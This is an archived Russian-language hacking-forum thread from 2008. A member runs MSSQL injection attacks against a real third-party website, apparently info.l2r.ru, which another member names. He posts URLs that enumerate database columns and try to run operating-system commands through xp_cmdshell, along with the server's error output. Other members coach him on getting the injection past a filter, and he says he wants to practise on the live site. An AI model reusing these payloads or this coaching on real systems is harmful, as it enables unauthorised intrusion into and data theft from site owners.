HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Mssql не могу понять
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Mssql не могу понять
  #1  
Старый 25.03.2008, 21:15
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию Mssql не могу понять
Код:
http://***.***.ru/?id=1%20or%201=(select%20TOP%201%20COLUMN_NAME%20FROM%20INFORMATION_SCHEMA.COLUMNS%20where%20TABLE_NAME='henna')--
ошибка: message: Invalid column name 'henna'. (severity 16)
че так плохо?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 25.03.2008, 21:38
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами: 10516826

Репутация: 3742


По умолчанию
заэнкодь henna в чар
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #3  
Старый 26.03.2008, 00:50
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию
заработала, спс.

вот теперь другое интересует
Код:
http://***.***.ru/?id=1;exec%20master..xp_cmdshell%20'dir%20c:\'--
Conversion failed when converting the varchar value '1exec master..xp_cmdshell dir c:' to data type int. (severity 16)

Incorrect syntax near 'xec'.

он ; вообще невидит, фильтрует походу, чето можно сделать?


еще интересно как пользоваться http://www.hack-shop.org.ru/tools-mssql-exractor
видел тут видео было, но ссылка здохла( обьясните плз!
Последний раз редактировалось Grema; 26.03.2008 в 03:23..
 
Ответить с цитированием

  #4  
Старый 26.03.2008, 12:15
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
С нами: 10263386

Репутация: 849
По умолчанию
info.l2r.ru?
там ни одной таблицы с рег данными нет
 
Ответить с цитированием

  #5  
Старый 26.03.2008, 19:18
Grema
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами: 10761096

Репутация: 27
По умолчанию
та я попрактиковаться хочу с MSSQL, никогда не ломал! поэтому и интересуюсь.

а сайт ты правильно подметил) как нашёл?
+ если ; как то сделать то можно заюзать xp_cmdshell или еще что-то.
подскажите как
 
Ответить с цитированием

  #6  
Старый 26.03.2008, 22:51
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
Там, что база запущена под sa?
Сомневаюсь , а в остальных случаях 99% на эти команды у тебя прав не хватит
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Не могу понять... Dober'man Windows 4 16.02.2008 08:38
Вот не могу понять spy-profi PHP 3 13.02.2008 13:44
НЕ могу понять bxN5 PHP 15 15.02.2006 18:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.